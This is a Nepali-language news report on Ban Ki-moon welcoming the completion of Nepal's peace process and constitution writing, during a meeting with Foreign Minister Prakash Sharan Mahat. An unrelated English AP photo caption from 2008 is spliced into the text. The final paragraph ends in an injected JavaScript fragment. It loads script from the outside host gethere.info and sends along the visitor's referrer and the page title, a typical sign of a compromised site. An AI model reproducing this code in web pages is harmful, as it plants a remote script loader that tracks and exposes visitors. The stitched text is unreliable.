नेपालको शान्ति र संविधान लेखन प्रक्रियाले पूर्णता पाएकामा बान कि–मुन खुसि

न्युयोर्क, असोज ८ । संयुक्त राष्ट्र सङ्घका महासचिव बान कि–मुनले नेपालको शान्ति प्रक्रिया र संविधान लेखनको प्रक्रियाले पूर्णता पाएकामा खुसी व्यक्त गर्दै शान्ति प्रक्रियासँग बाँकी रहेका विषयलाई समेत तत्काल पूर्णता दिएर अगाडि बढ्न नेपालका राजनीतिक दल र सरोकार भएका पक्ष सफल हुने विश्वास व्यक्त गरेका छन् ।
राष्ट्र सङ्घको महासभामा नेपाली प्रतिनिधिमण्डलको नेतृत्व गरेका परराष्ट्रमन्त्री डा प्रकाशशरण महतसँगको भेटमा मुनले नेपाल समद्धिका दिशामा अगाडि बढोस् भन्ने आफ्नो सन्देश प्रधानमन्त्री पुष्पकमल दाहाललाई सुनाइदिन समेत आग्रह गरेका थिए । त्यस अवसरमा सन् २०३० सम्म दिगो विकास लक्ष्य प्राप्त गर्न नेपालले गर्न सक्ने काम तथा कारबाहीका बारेमा समेत उहाँले चासो राख्दै सफलताको शुभकामना दिएका थिए ।

U.N. Secretary-General Ban Ki-moon gestures during a press conference at the United Nations headquarters in Geneva, Switzerland Friday, Dec. 12, 2008. Ban says the latest "very sobering" assessment of the World Bank underscores the world's economic problems. The world should act with great urgency and compassion to ease economic distress. (AP Photo/Anja Niedringhaus)
राष्ट्र सङ्घको मुख्यालयमा भएको भेटमा महासचिव मुनले संविधान कार्यान्वयनका अवस्थाका बारेमा राखेको जिज्ञासामा परराष्ट्रमन्त्री डा महतले सबै दलको सहमतिमा संविधान कार्यान्वयन प्रक्रियाले गति लिएको र शान्ति सम्झौताका हस्ताक्षरकर्ता नेपाली काँग्रेस र नेकपा(माओवादी केन्द्र)लगायत दल मिलेर संयुक्त सरकार गठन गरिएको बताए ।s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Loading...